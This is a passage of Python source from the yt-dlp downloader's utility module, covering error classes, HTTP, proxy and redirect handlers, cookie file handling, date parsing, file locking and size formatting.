def __init__(self, msg, exc_info=None):
""" exc_info, if given, is the original exception that caused the trouble (as returned by sys.exc_info()). """
super(DownloadError, self).__init__(msg)
self.exc_info = exc_info
class EntryNotInPlaylist(YoutubeDLError):
"""Entry not in playlist exception.
This exception will be thrown by YoutubeDL when a requested entry
is not found in the playlist info_dict
"""
pass
class SameFileError(YoutubeDLError):
"""Same File exception.
This exception will be thrown by FileDownloader objects if they detect
multiple files would have to be downloaded to the same file on disk.
"""
pass
class PostProcessingError(YoutubeDLError):
"""Post Processing exception.
This exception may be raised by PostProcessor's .run() method to
indicate an error in the postprocessing task.
"""
def __init__(self, msg):
super(PostProcessingError, self).__init__(msg)
self.msg = msg
class ExistingVideoReached(YoutubeDLError):
""" --max-downloads limit has been reached. """
pass
class RejectedVideoReached(YoutubeDLError):
""" --max-downloads limit has been reached. """
pass
class ThrottledDownload(YoutubeDLError):
""" Download speed below --throttled-rate. """
pass
class MaxDownloadsReached(YoutubeDLError):
""" --max-downloads limit has been reached. """
pass
class UnavailableVideoError(YoutubeDLError):
"""Unavailable Format exception.
This exception will be thrown when a video is requested
in a format that is not available for that video.
"""
pass
class ContentTooShortError(YoutubeDLError):
"""Content Too Short exception.
This exception may be raised by FileDownloader objects when a file they
download is too small for what the server announced first, indicating
the connection was probably interrupted.
"""
def __init__(self, downloaded, expected):
super(ContentTooShortError, self).__init__(
'Downloaded {0} bytes, expected {1} bytes'.format(downloaded, expected)
)
# Both in bytes
self.downloaded = downloaded
self.expected = expected
class XAttrMetadataError(YoutubeDLError):
def __init__(self, code=None, msg='Unknown error'):
super(XAttrMetadataError, self).__init__(msg)
self.code = code
self.msg = msg
# Parsing code and msg
if (self.code in (errno.ENOSPC, errno.EDQUOT)
or 'No space left' in self.msg or 'Disk quota exceeded' in self.msg):
self.reason = 'NO_SPACE'
elif self.code == errno.E2BIG or 'Argument list too long' in self.msg:
self.reason = 'VALUE_TOO_LONG'
else:
self.reason = 'NOT_SUPPORTED'
class XAttrUnavailableError(YoutubeDLError):
pass
def _create_http_connection(ydl_handler, http_class, is_https, *args, **kwargs):
# Working around python 2 bug (see http://bugs.python.org/issue17849) by limiting
# expected HTTP responses to meet HTTP/1.0 or later (see also
# https://github.com/ytdl-org/youtube-dl/issues/6727)
if sys.version_info < (3, 0):
kwargs['strict'] = True
hc = http_class(*args, **compat_kwargs(kwargs))
source_address = ydl_handler._params.get('source_address')
if source_address is not None:
# This is to workaround _create_connection() from socket where it will try all
# address data from getaddrinfo() including IPv6. This filters the result from
# getaddrinfo() based on the source_address value.
# This is based on the cpython socket.create_connection() function.
# https://github.com/python/cpython/blob/master/Lib/socket.py#L691
def _create_connection(address, timeout=socket._GLOBAL_DEFAULT_TIMEOUT, source_address=None):
host, port = address
err = None
addrs = socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM)
af = socket.AF_INET if '.' in source_address[0] else socket.AF_INET6
ip_addrs = [addr for addr in addrs if addr[0] == af]
if addrs and not ip_addrs:
ip_version = 'v4' if af == socket.AF_INET else 'v6'
raise socket.error(
"No remote IP%s addresses available for connect, can't use '%s' as source address"
% (ip_version, source_address[0]))
for res in ip_addrs:
af, socktype, proto, canonname, sa = res
sock = None
try:
sock = socket.socket(af, socktype, proto)
if timeout is not socket._GLOBAL_DEFAULT_TIMEOUT:
sock.settimeout(timeout)
sock.bind(source_address)
sock.connect(sa)
err = None # Explicitly break reference cycle
return sock
except socket.error as _:
err = _
if sock is not None:
sock.close()
if err is not None:
raise err
else:
raise socket.error('getaddrinfo returns an empty list')
if hasattr(hc, '_create_connection'):
hc._create_connection = _create_connection
sa = (source_address, 0)
if hasattr(hc, 'source_address'): # Python 2.7+
hc.source_address = sa
else: # Python 2.6
def _hc_connect(self, *args, **kwargs):
sock = _create_connection(
(self.host, self.port), self.timeout, sa)
if is_https:
self.sock = ssl.wrap_socket(
sock, self.key_file, self.cert_file,
ssl_version=ssl.PROTOCOL_TLSv1)
else:
self.sock = sock
hc.connect = functools.partial(_hc_connect, hc)
return hc
def handle_youtubedl_headers(headers):
filtered_headers = headers
if 'Youtubedl-no-compression' in filtered_headers:
filtered_headers = dict((k, v) for k, v in filtered_headers.items() if k.lower() != 'accept-encoding')
del filtered_headers['Youtubedl-no-compression']
return filtered_headers
class YoutubeDLHandler(compat_urllib_request.HTTPHandler):
"""Handler for HTTP requests and responses.
This class, when installed with an OpenerDirector, automatically adds
the standard headers to every HTTP request and handles gzipped and
deflated responses from web servers. If compression is to be avoided in
a particular request, the original request in the program code only has
to include the HTTP header "Youtubedl-no-compression", which will be
removed before making the real request.
Part of this code was copied from:
http://techknack.net/python-urllib2-handlers/
Andrew Rowls, the author of that code, agreed to release it to the
public domain.
"""
def __init__(self, params, *args, **kwargs):
compat_urllib_request.HTTPHandler.__init__(self, *args, **kwargs)
self._params = params
def http_open(self, req):
conn_class = compat_http_client.HTTPConnection
socks_proxy = req.headers.get('Ytdl-socks-proxy')
if socks_proxy:
conn_class = make_socks_conn_class(conn_class, socks_proxy)
del req.headers['Ytdl-socks-proxy']
return self.do_open(functools.partial(
_create_http_connection, self, conn_class, False),
req)
@staticmethod
def deflate(data):
if not data:
return data
try:
return zlib.decompress(data, -zlib.MAX_WBITS)
except zlib.error:
return zlib.decompress(data)
def http_request(self, req):
# According to RFC 3986, URLs can not contain non-ASCII characters, however this is not
# always respected by websites, some tend to give out URLs with non percent-encoded
# non-ASCII characters (see telemb.py, ard.py [#3412])
# urllib chokes on URLs with non-ASCII characters (see http://bugs.python.org/issue3991)
# To work around aforementioned issue we will replace request's original URL with
# percent-encoded one
# Since redirects are also affected (e.g. http://www.southpark.de/alle-episoden/s18e09)
# the code of this workaround has been moved here from YoutubeDL.urlopen()
url = req.get_full_url()
url_escaped = escape_url(url)
# Substitute URL if any change after escaping
if url != url_escaped:
req = update_Request(req, url=url_escaped)
for h, v in std_headers.items():
# Capitalize is needed because of Python bug 2275: http://bugs.python.org/issue2275
# The dict keys are capitalized because of this bug by urllib
if h.capitalize() not in req.headers:
req.add_header(h, v)
req.headers = handle_youtubedl_headers(req.headers)
if sys.version_info < (2, 7) and '#' in req.get_full_url():
# Python 2.6 is brain-dead when it comes to fragments
req._Request__original = req._Request__original.partition('#')[0]
req._Request__r_type = req._Request__r_type.partition('#')[0]
return req
def http_response(self, req, resp):
old_resp = resp
# gzip
if resp.headers.get('Content-encoding', '') == 'gzip':
content = resp.read()
gz = gzip.GzipFile(fileobj=io.BytesIO(content), mode='rb')
try:
uncompressed = io.BytesIO(gz.read())
except IOError as original_ioerror:
# There may be junk add the end of the file
# See http://stackoverflow.com/q/4928560/35070 for details
for i in range(1, 1024):
try:
gz = gzip.GzipFile(fileobj=io.BytesIO(content[:-i]), mode='rb')
uncompressed = io.BytesIO(gz.read())
except IOError:
continue
break
else:
raise original_ioerror
resp = compat_urllib_request.addinfourl(uncompressed, old_resp.headers, old_resp.url, old_resp.code)
resp.msg = old_resp.msg
del resp.headers['Content-encoding']
# deflate
if resp.headers.get('Content-encoding', '') == 'deflate':
gz = io.BytesIO(self.deflate(resp.read()))
resp = compat_urllib_request.addinfourl(gz, old_resp.headers, old_resp.url, old_resp.code)
resp.msg = old_resp.msg
del resp.headers['Content-encoding']
# Percent-encode redirect URL of Location HTTP header to satisfy RFC 3986 (see
# https://github.com/ytdl-org/youtube-dl/issues/6457).
if 300 <= resp.code < 400:
location = resp.headers.get('Location')
if location:
# As of RFC 2616 default charset is iso-8859-1 that is respected by python 3
if sys.version_info >= (3, 0):
location = location.encode('iso-8859-1').decode('utf-8')
else:
location = location.decode('utf-8')
location_escaped = escape_url(location)
if location != location_escaped:
del resp.headers['Location']
if sys.version_info < (3, 0):
location_escaped = location_escaped.encode('utf-8')
resp.headers['Location'] = location_escaped
return resp
https_request = http_request
https_response = http_response
def make_socks_conn_class(base_class, socks_proxy):
assert issubclass(base_class, (
compat_http_client.HTTPConnection, compat_http_client.HTTPSConnection))
url_components = compat_urlparse.urlparse(socks_proxy)
if url_components.scheme.lower() == 'socks5':
socks_type = ProxyType.SOCKS5
elif url_components.scheme.lower() in ('socks', 'socks4'):
socks_type = ProxyType.SOCKS4
elif url_components.scheme.lower() == 'socks4a':
socks_type = ProxyType.SOCKS4A
def unquote_if_non_empty(s):
if not s:
return s
return compat_urllib_parse_unquote_plus(s)
proxy_args = (
socks_type,
url_components.hostname, url_components.port or 1080,
True, # Remote DNS
unquote_if_non_empty(url_components.username),
unquote_if_non_empty(url_components.password),
)
class SocksConnection(base_class):
def connect(self):
self.sock = sockssocket()
self.sock.setproxy(*proxy_args)
if type(self.timeout) in (int, float):
self.sock.settimeout(self.timeout)
self.sock.connect((self.host, self.port))
if isinstance(self, compat_http_client.HTTPSConnection):
if hasattr(self, '_context'): # Python > 2.6
self.sock = self._context.wrap_socket(
self.sock, server_hostname=self.host)
else:
self.sock = ssl.wrap_socket(self.sock)
return SocksConnection
class YoutubeDLHTTPSHandler(compat_urllib_request.HTTPSHandler):
def __init__(self, params, https_conn_class=None, *args, **kwargs):
compat_urllib_request.HTTPSHandler.__init__(self, *args, **kwargs)
self._https_conn_class = https_conn_class or compat_http_client.HTTPSConnection
self._params = params
def https_open(self, req):
kwargs = {}
conn_class = self._https_conn_class
if hasattr(self, '_context'): # python > 2.6
kwargs['context'] = self._context
if hasattr(self, '_check_hostname'): # python 3.x
kwargs['check_hostname'] = self._check_hostname
socks_proxy = req.headers.get('Ytdl-socks-proxy')
if socks_proxy:
conn_class = make_socks_conn_class(conn_class, socks_proxy)
del req.headers['Ytdl-socks-proxy']
return self.do_open(functools.partial(
_create_http_connection, self, conn_class, True),
req, **kwargs)
class YoutubeDLCookieJar(compat_cookiejar.MozillaCookieJar):
"""
See [1] for cookie file format.
1. https://curl.haxx.se/docs/http-cookies.html
"""
_HTTPONLY_PREFIX = '#HttpOnly_'
_ENTRY_LEN = 7
_HEADER = '''# Netscape HTTP Cookie File
# This file is generated by yt-dlp. Do not edit.
'''
_CookieFileEntry = collections.namedtuple(
'CookieFileEntry',
('domain_name', 'include_subdomains', 'path', 'https_only', 'expires_at', 'name', 'value'))
def save(self, filename=None, ignore_discard=False, ignore_expires=False):
"""
Save cookies to a file.
Most of the code is taken from CPython 3.8 and slightly adapted
to support cookie files with UTF-8 in both python 2 and 3.
"""
if filename is None:
if self.filename is not None:
filename = self.filename
else:
raise ValueError(compat_cookiejar.MISSING_FILENAME_TEXT)
# Store session cookies with `expires` set to 0 instead of an empty
# string
for cookie in self:
if cookie.expires is None:
cookie.expires = 0
with io.open(filename, 'w', encoding='utf-8') as f:
f.write(self._HEADER)
now = time.time()
for cookie in self:
if not ignore_discard and cookie.discard:
continue
if not ignore_expires and cookie.is_expired(now):
continue
if cookie.secure:
secure = 'TRUE'
else:
secure = 'FALSE'
if cookie.domain.startswith('.'):
initial_dot = 'TRUE'
else:
initial_dot = 'FALSE'
if cookie.expires is not None:
expires = compat_str(cookie.expires)
else:
expires = ''
if cookie.value is None:
# cookies.txt regards 'Set-Cookie: foo' as a cookie
# with no name, whereas http.cookiejar regards it as a
# cookie with no value.
name = ''
value = cookie.name
else:
name = cookie.name
value = cookie.value
f.write(
'\t'.join([cookie.domain, initial_dot, cookie.path,
secure, expires, name, value]) + '\n')
def load(self, filename=None, ignore_discard=False, ignore_expires=False):
"""Load cookies from a file."""
if filename is None:
if self.filename is not None:
filename = self.filename
else:
raise ValueError(compat_cookiejar.MISSING_FILENAME_TEXT)
def prepare_line(line):
if line.startswith(self._HTTPONLY_PREFIX):
line = line[len(self._HTTPONLY_PREFIX):]
# comments and empty lines are fine
if line.startswith('#') or not line.strip():
return line
cookie_list = line.split('\t')
if len(cookie_list) != self._ENTRY_LEN:
raise compat_cookiejar.LoadError('invalid length %d' % len(cookie_list))
cookie = self._CookieFileEntry(*cookie_list)
if cookie.expires_at and not cookie.expires_at.isdigit():
raise compat_cookiejar.LoadError('invalid expires at %s' % cookie.expires_at)
return line
cf = io.StringIO()
with io.open(filename, encoding='utf-8') as f:
for line in f:
try:
cf.write(prepare_line(line))
except compat_cookiejar.LoadError as e:
write_string(
'WARNING: skipping cookie file entry due to %s: %r\n'
% (e, line), sys.stderr)
continue
cf.seek(0)
self._really_load(cf, filename, ignore_discard, ignore_expires)
# Session cookies are denoted by either `expires` field set to
# an empty string or 0. MozillaCookieJar only recognizes the former
# (see [1]). So we need force the latter to be recognized as session
# cookies on our own.
# Session cookies may be important for cookies-based authentication,
# e.g. usually, when user does not check 'Remember me' check box while
# logging in on a site, some important cookies are stored as session
# cookies so that not recognizing them will result in failed login.
# 1. https://bugs.python.org/issue17164
for cookie in self:
# Treat `expires=0` cookies as session cookies
if cookie.expires == 0:
cookie.expires = None
cookie.discard = True
class YoutubeDLCookieProcessor(compat_urllib_request.HTTPCookieProcessor):
def __init__(self, cookiejar=None):
compat_urllib_request.HTTPCookieProcessor.__init__(self, cookiejar)
def http_response(self, request, response):
# Python 2 will choke on next HTTP request in row if there are non-ASCII
# characters in Set-Cookie HTTP header of last response (see
# https://github.com/ytdl-org/youtube-dl/issues/6769).
# In order to at least prevent crashing we will percent encode Set-Cookie
# header before HTTPCookieProcessor starts processing it.
# if sys.version_info < (3, 0) and response.headers:
# for set_cookie_header in ('Set-Cookie', 'Set-Cookie2'):
# set_cookie = response.headers.get(set_cookie_header)
# if set_cookie:
# set_cookie_escaped = compat_urllib_parse.quote(set_cookie, b"%/;:@&=+$,!~*'()?#[] ")
# if set_cookie != set_cookie_escaped:
# del response.headers[set_cookie_header]
# response.headers[set_cookie_header] = set_cookie_escaped
return compat_urllib_request.HTTPCookieProcessor.http_response(self, request, response)
https_request = compat_urllib_request.HTTPCookieProcessor.http_request
https_response = http_response
class YoutubeDLRedirectHandler(compat_urllib_request.HTTPRedirectHandler):
"""YoutubeDL redirect handler
The code is based on HTTPRedirectHandler implementation from CPython [1].
This redirect handler solves two issues:
- ensures redirect URL is always unicode under python 2
- introduces support for experimental HTTP response status code
308 Permanent Redirect [2] used by some sites [3]
1. https://github.com/python/cpython/blob/master/Lib/urllib/request.py
2. https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/308
3. https://github.com/ytdl-org/youtube-dl/issues/28768
"""
http_error_301 = http_error_303 = http_error_307 = http_error_308 = compat_urllib_request.HTTPRedirectHandler.http_error_302
def redirect_request(self, req, fp, code, msg, headers, newurl):
"""Return a Request or None in response to a redirect.
This is called by the http_error_30x methods when a
redirection response is received. If a redirection should
take place, return a new Request to allow http_error_30x to
perform the redirect. Otherwise, raise HTTPError if no-one
else should try to handle this url. Return None if you can't
but another Handler might.
"""
m = req.get_method()
if (not (code in (301, 302, 303, 307, 308) and m in ("GET", "HEAD")
or code in (301, 302, 303) and m == "POST")):
raise compat_HTTPError(req.full_url, code, msg, headers, fp)
# Strictly (according to RFC 2616), 301 or 302 in response to
# a POST MUST NOT cause a redirection without confirmation
# from the user (of urllib.request, in this case). In practice,
# essentially all clients do redirect in this case, so we do
# the same.
# On python 2 urlh.geturl() may sometimes return redirect URL
# as byte string instead of unicode. This workaround allows
# to force it always return unicode.
if sys.version_info[0] < 3:
newurl = compat_str(newurl)
# Be conciliant with URIs containing a space. This is mainly
# redundant with the more complete encoding done in http_error_302(),
# but it is kept for compatibility with other callers.
newurl = newurl.replace(' ', '%20')
CONTENT_HEADERS = ("content-length", "content-type")
# NB: don't use dict comprehension for python 2.6 compatibility
newheaders = dict((k, v) for k, v in req.headers.items()
if k.lower() not in CONTENT_HEADERS)
return compat_urllib_request.Request(
newurl, headers=newheaders, origin_req_host=req.origin_req_host,
unverifiable=True)
def extract_timezone(date_str):
m = re.search(
r'^.{8,}?(?P<tz>Z$| ?(?P<sign>\+|-)(?P<hours>[0-9]{2}):?(?P<minutes>[0-9]{2})$)',
date_str)
if not m:
timezone = datetime.timedelta()
else:
date_str = date_str[:-len(m.group('tz'))]
if not m.group('sign'):
timezone = datetime.timedelta()
else:
sign = 1 if m.group('sign') == '+' else -1
timezone = datetime.timedelta(
hours=sign * int(m.group('hours')),
minutes=sign * int(m.group('minutes')))
return timezone, date_str
def parse_iso8601(date_str, delimiter='T', timezone=None):
""" Return a UNIX timestamp from the given date """
if date_str is None:
return None
date_str = re.sub(r'\.[0-9]+', '', date_str)
if timezone is None:
timezone, date_str = extract_timezone(date_str)
try:
date_format = '%Y-%m-%d{0}%H:%M:%S'.format(delimiter)
dt = datetime.datetime.strptime(date_str, date_format) - timezone
return calendar.timegm(dt.timetuple())
except ValueError:
pass
def date_formats(day_first=True):
return DATE_FORMATS_DAY_FIRST if day_first else DATE_FORMATS_MONTH_FIRST
def unified_strdate(date_str, day_first=True):
"""Return a string with the date in the format YYYYMMDD"""
if date_str is None:
return None
upload_date = None
# Replace commas
date_str = date_str.replace(',', ' ')
# Remove AM/PM + timezone
date_str = re.sub(r'(?i)\s*(?:AM|PM)(?:\s+[A-Z]+)?', '', date_str)
_, date_str = extract_timezone(date_str)
for expression in date_formats(day_first):
try:
upload_date = datetime.datetime.strptime(date_str, expression).strftime('%Y%m%d')
except ValueError:
pass
if upload_date is None:
timetuple = email.utils.parsedate_tz(date_str)
if timetuple:
try:
upload_date = datetime.datetime(*timetuple[:6]).strftime('%Y%m%d')
except ValueError:
pass
if upload_date is not None:
return compat_str(upload_date)
def unified_timestamp(date_str, day_first=True):
if date_str is None:
return None
date_str = re.sub(r'[,|]', '', date_str)
pm_delta = 12 if re.search(r'(?i)PM', date_str) else 0
timezone, date_str = extract_timezone(date_str)
# Remove AM/PM + timezone
date_str = re.sub(r'(?i)\s*(?:AM|PM)(?:\s+[A-Z]+)?', '', date_str)
# Remove unrecognized timezones from ISO 8601 alike timestamps
m = re.search(r'\d{1,2}:\d{1,2}(?:\.\d+)?(?P<tz>\s*[A-Z]+)$', date_str)
if m:
date_str = date_str[:-len(m.group('tz'))]
# Python only supports microseconds, so remove nanoseconds
m = re.search(r'^([0-9]{4,}-[0-9]{1,2}-[0-9]{1,2}T[0-9]{1,2}:[0-9]{1,2}:[0-9]{1,2}\.[0-9]{6})[0-9]+$', date_str)
if m:
date_str = m.group(1)
for expression in date_formats(day_first):
try:
dt = datetime.datetime.strptime(date_str, expression) - timezone + datetime.timedelta(hours=pm_delta)
return calendar.timegm(dt.timetuple())
except ValueError:
pass
timetuple = email.utils.parsedate_tz(date_str)
if timetuple:
return calendar.timegm(timetuple) + pm_delta * 3600
def determine_ext(url, default_ext='unknown_video'):
if url is None or '.' not in url:
return default_ext
guess = url.partition('?')[0].rpartition('.')[2]
if re.match(r'^[A-Za-z0-9]+$', guess):
return guess
# Try extract ext from URLs like http://example.com/foo/bar.mp4/?download
elif guess.rstrip('/') in KNOWN_EXTENSIONS:
return guess.rstrip('/')
else:
return default_ext
def subtitles_filename(filename, sub_lang, sub_format, expected_real_ext=None):
return replace_extension(filename, sub_lang + '.' + sub_format, expected_real_ext)
def datetime_from_str(date_str, precision='auto', format='%Y%m%d'):
"""
Return a datetime object from a string in the format YYYYMMDD or
(now|today|date)[+-][0-9](microsecond|second|minute|hour|day|week|month|year)(s)?
format: string date format used to return datetime object from
precision: round the time portion of a datetime object.
auto|microsecond|second|minute|hour|day.
auto: round to the unit provided in date_str (if applicable).
"""
auto_precision = False
if precision == 'auto':
auto_precision = True
precision = 'microsecond'
today = datetime_round(datetime.datetime.now(), precision)
if date_str in ('now', 'today'):
return today
if date_str == 'yesterday':
return today - datetime.timedelta(days=1)
match = re.match(
r'(?P<start>.+)(?P<sign>[+-])(?P<time>\d+)(?P<unit>microsecond|second|minute|hour|day|week|month|year)(s)?',
date_str)
if match is not None:
start_time = datetime_from_str(match.group('start'), precision, format)
time = int(match.group('time')) * (-1 if match.group('sign') == '-' else 1)
unit = match.group('unit')
if unit == 'month' or unit == 'year':
new_date = datetime_add_months(start_time, time * 12 if unit == 'year' else time)
unit = 'day'
else:
if unit == 'week':
unit = 'day'
time *= 7
delta = datetime.timedelta(**{unit + 's': time})
new_date = start_time + delta
if auto_precision:
return datetime_round(new_date, unit)
return new_date
return datetime_round(datetime.datetime.strptime(date_str, format), precision)
def date_from_str(date_str, format='%Y%m%d'):
"""
Return a datetime object from a string in the format YYYYMMDD or
(now|today|date)[+-][0-9](microsecond|second|minute|hour|day|week|month|year)(s)?
format: string date format used to return datetime object from
"""
return datetime_from_str(date_str, precision='microsecond', format=format).date()
def datetime_add_months(dt, months):
"""Increment/Decrement a datetime object by months."""
month = dt.month + months - 1
year = dt.year + month // 12
month = month % 12 + 1
day = min(dt.day, calendar.monthrange(year, month)[1])
return dt.replace(year, month, day)
def datetime_round(dt, precision='day'):
"""
Round a datetime object's time to a specific precision
"""
if precision == 'microsecond':
return dt
unit_seconds = {
'day': 86400,
'hour': 3600,
'minute': 60,
'second': 1,
}
roundto = lambda x, n: ((x + n / 2) // n) * n
timestamp = calendar.timegm(dt.timetuple())
return datetime.datetime.utcfromtimestamp(roundto(timestamp, unit_seconds[precision]))
def hyphenate_date(date_str):
"""
Convert a date in 'YYYYMMDD' format to 'YYYY-MM-DD' format"""
match = re.match(r'^(\d\d\d\d)(\d\d)(\d\d)$', date_str)
if match is not None:
return '-'.join(match.groups())
else:
return date_str
class DateRange(object):
"""Represents a time interval between two dates"""
def __init__(self, start=None, end=None):
"""start and end must be strings in the format accepted by date"""
if start is not None:
self.start = date_from_str(start)
else:
self.start = datetime.datetime.min.date()
if end is not None:
self.end = date_from_str(end)
else:
self.end = datetime.datetime.max.date()
if self.start > self.end:
raise ValueError('Date range: "%s" , the start date must be before the end date' % self)
@classmethod
def day(cls, day):
"""Returns a range that only contains the given day"""
return cls(day, day)
def __contains__(self, date):
"""Check if the date is in the range"""
if not isinstance(date, datetime.date):
date = date_from_str(date)
return self.start <= date <= self.end
def __str__(self):
return '%s - %s' % (self.start.isoformat(), self.end.isoformat())
def platform_name():
""" Returns the platform name as a compat_str """
res = platform.platform()
if isinstance(res, bytes):
res = res.decode(preferredencoding())
assert isinstance(res, compat_str)
return res
def _windows_write_string(s, out):
""" Returns True if the string was written using special methods,
False if it has yet to be written out."""
# Adapted from http://stackoverflow.com/a/3259271/35070
import ctypes
import ctypes.wintypes
WIN_OUTPUT_IDS = {
1: -11,
2: -12,
}
try:
fileno = out.fileno()
except AttributeError:
# If the output stream doesn't have a fileno, it's virtual
return False
except io.UnsupportedOperation:
# Some strange Windows pseudo files?
return False
if fileno not in WIN_OUTPUT_IDS:
return False
GetStdHandle = compat_ctypes_WINFUNCTYPE(
ctypes.wintypes.HANDLE, ctypes.wintypes.DWORD)(
('GetStdHandle', ctypes.windll.kernel32))
h = GetStdHandle(WIN_OUTPUT_IDS[fileno])
WriteConsoleW = compat_ctypes_WINFUNCTYPE(
ctypes.wintypes.BOOL, ctypes.wintypes.HANDLE, ctypes.wintypes.LPWSTR,
ctypes.wintypes.DWORD, ctypes.POINTER(ctypes.wintypes.DWORD),
ctypes.wintypes.LPVOID)(('WriteConsoleW', ctypes.windll.kernel32))
written = ctypes.wintypes.DWORD(0)
GetFileType = compat_ctypes_WINFUNCTYPE(ctypes.wintypes.DWORD, ctypes.wintypes.DWORD)(('GetFileType', ctypes.windll.kernel32))
FILE_TYPE_CHAR = 0x0002
FILE_TYPE_REMOTE = 0x8000
GetConsoleMode = compat_ctypes_WINFUNCTYPE(
ctypes.wintypes.BOOL, ctypes.wintypes.HANDLE,
ctypes.POINTER(ctypes.wintypes.DWORD))(
('GetConsoleMode', ctypes.windll.kernel32))
INVALID_HANDLE_VALUE = ctypes.wintypes.DWORD(-1).value
def not_a_console(handle):
if handle == INVALID_HANDLE_VALUE or handle is None:
return True
return ((GetFileType(handle) & ~FILE_TYPE_REMOTE) != FILE_TYPE_CHAR
or GetConsoleMode(handle, ctypes.byref(ctypes.wintypes.DWORD())) == 0)
if not_a_console(h):
return False
def next_nonbmp_pos(s):
try:
return next(i for i, c in enumerate(s) if ord(c) > 0xffff)
except StopIteration:
return len(s)
while s:
count = min(next_nonbmp_pos(s), 1024)
ret = WriteConsoleW(
h, s, count if count else 2, ctypes.byref(written), None)
if ret == 0:
raise OSError('Failed to write string')
if not count: # We just wrote a non-BMP character
assert written.value == 2
s = s[1:]
else:
assert written.value > 0
s = s[written.value:]
return True
def write_string(s, out=None, encoding=None):
if out is None:
out = sys.stderr
assert type(s) == compat_str
if sys.platform == 'win32' and encoding is None and hasattr(out, 'fileno'):
if _windows_write_string(s, out):
return
if ('b' in getattr(out, 'mode', '')
or sys.version_info[0] < 3): # Python 2 lies about mode of sys.stderr
byt = s.encode(encoding or preferredencoding(), 'ignore')
out.write(byt)
elif hasattr(out, 'buffer'):
enc = encoding or getattr(out, 'encoding', None) or preferredencoding()
byt = s.encode(enc, 'ignore')
out.buffer.write(byt)
else:
out.write(s)
out.flush()
def bytes_to_intlist(bs):
if not bs:
return []
if isinstance(bs[0], int): # Python 3
return list(bs)
else:
return [ord(c) for c in bs]
def intlist_to_bytes(xs):
if not xs:
return b''
return compat_struct_pack('%dB' % len(xs), *xs)
# Cross-platform file locking
if sys.platform == 'win32':
import ctypes.wintypes
import msvcrt
class OVERLAPPED(ctypes.Structure):
_fields_ = [
('Internal', ctypes.wintypes.LPVOID),
('InternalHigh', ctypes.wintypes.LPVOID),
('Offset', ctypes.wintypes.DWORD),
('OffsetHigh', ctypes.wintypes.DWORD),
('hEvent', ctypes.wintypes.HANDLE),
]
kernel32 = ctypes.windll.kernel32
LockFileEx = kernel32.LockFileEx
LockFileEx.argtypes = [
ctypes.wintypes.HANDLE, # hFile
ctypes.wintypes.DWORD, # dwFlags
ctypes.wintypes.DWORD, # dwReserved
ctypes.wintypes.DWORD, # nNumberOfBytesToLockLow
ctypes.wintypes.DWORD, # nNumberOfBytesToLockHigh
ctypes.POINTER(OVERLAPPED) # Overlapped
]
LockFileEx.restype = ctypes.wintypes.BOOL
UnlockFileEx = kernel32.UnlockFileEx
UnlockFileEx.argtypes = [
ctypes.wintypes.HANDLE, # hFile
ctypes.wintypes.DWORD, # dwReserved
ctypes.wintypes.DWORD, # nNumberOfBytesToLockLow
ctypes.wintypes.DWORD, # nNumberOfBytesToLockHigh
ctypes.POINTER(OVERLAPPED) # Overlapped
]
UnlockFileEx.restype = ctypes.wintypes.BOOL
whole_low = 0xffffffff
whole_high = 0x7fffffff
def _lock_file(f, exclusive):
overlapped = OVERLAPPED()
overlapped.Offset = 0
overlapped.OffsetHigh = 0
overlapped.hEvent = 0
f._lock_file_overlapped_p = ctypes.pointer(overlapped)
handle = msvcrt.get_osfhandle(f.fileno())
if not LockFileEx(handle, 0x2 if exclusive else 0x0, 0,
whole_low, whole_high, f._lock_file_overlapped_p):
raise OSError('Locking file failed: %r' % ctypes.FormatError())
def _unlock_file(f):
assert f._lock_file_overlapped_p
handle = msvcrt.get_osfhandle(f.fileno())
if not UnlockFileEx(handle, 0,
whole_low, whole_high, f._lock_file_overlapped_p):
raise OSError('Unlocking file failed: %r' % ctypes.FormatError())
else:
# Some platforms, such as Jython, is missing fcntl
try:
import fcntl
def _lock_file(f, exclusive):
fcntl.flock(f, fcntl.LOCK_EX if exclusive else fcntl.LOCK_SH)
def _unlock_file(f):
fcntl.flock(f, fcntl.LOCK_UN)
except ImportError:
UNSUPPORTED_MSG = 'file locking is not supported on this platform'
def _lock_file(f, exclusive):
raise IOError(UNSUPPORTED_MSG)
def _unlock_file(f):
raise IOError(UNSUPPORTED_MSG)
class locked_file(object):
def __init__(self, filename, mode, encoding=None):
assert mode in ['r', 'a', 'w']
self.f = io.open(filename, mode, encoding=encoding)
self.mode = mode
def __enter__(self):
exclusive = self.mode != 'r'
try:
_lock_file(self.f, exclusive)
except IOError:
self.f.close()
raise
return self
def __exit__(self, etype, value, traceback):
try:
_unlock_file(self.f)
finally:
self.f.close()
def __iter__(self):
return iter(self.f)
def write(self, *args):
return self.f.write(*args)
def read(self, *args):
return self.f.read(*args)
def get_filesystem_encoding():
encoding = sys.getfilesystemencoding()
return encoding if encoding is not None else 'utf-8'
def shell_quote(args):
quoted_args = []
encoding = get_filesystem_encoding()
for a in args:
if isinstance(a, bytes):
# We may get a filename encoded with 'encodeFilename'
a = a.decode(encoding)
quoted_args.append(compat_shlex_quote(a))
return ' '.join(quoted_args)
def smuggle_url(url, data):
""" Pass additional data in a URL for internal use. """
url, idata = unsmuggle_url(url, {})
data.update(idata)
sdata = compat_urllib_parse_urlencode(
{'__youtubedl_smuggle': json.dumps(data)})
return url + '#' + sdata
def unsmuggle_url(smug_url, default=None):
if '#__youtubedl_smuggle' not in smug_url:
return smug_url, default
url, _, sdata = smug_url.rpartition('#')
jsond = compat_parse_qs(sdata)['__youtubedl_smuggle'][0]
data = json.loads(jsond)
return url, data
def format_bytes(bytes):
if bytes is None:
return 'N/A'
if type(bytes) is str:
bytes = float(bytes)
if bytes == 0.0:
exponent = 0
else:
exponent = int(math.log(bytes, 1024.0))
suffix = ['B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB', 'YiB'][exponent]
converted = float(bytes) / float(1024 ** exponent)
return '%.2f%s' % (converted, suffix)
def lookup_unit_table(unit_table, s):
units_re = '|'.join(re.escape(u) for u in unit_table)
m = re.match(
r'(?P<num>[0-9]+(?:[,.][0-9]*)?)\s*(?P<unit>%s)\b' % units_re, s)
if not m:
return None
num_str = m.group('num').replace(',', '.')
mult = unit_table[m.group('unit')]
return int(float(num_str) * mult)
def parse_filesize(s):
if s is None:
return None
# The lower-case forms are of course incorrect and unofficial,
# but we support those too
_UNIT_TABLE = {
'B': 1,
'b': 1,
'bytes': 1,
'KiB': 1024,
'KB': 1000,
'kB': 1024,
'Kb': 1000,
'kb': 1000,
'kilobytes': 1000,
'kibibytes': 1024,
'MiB': 1024 ** 2,
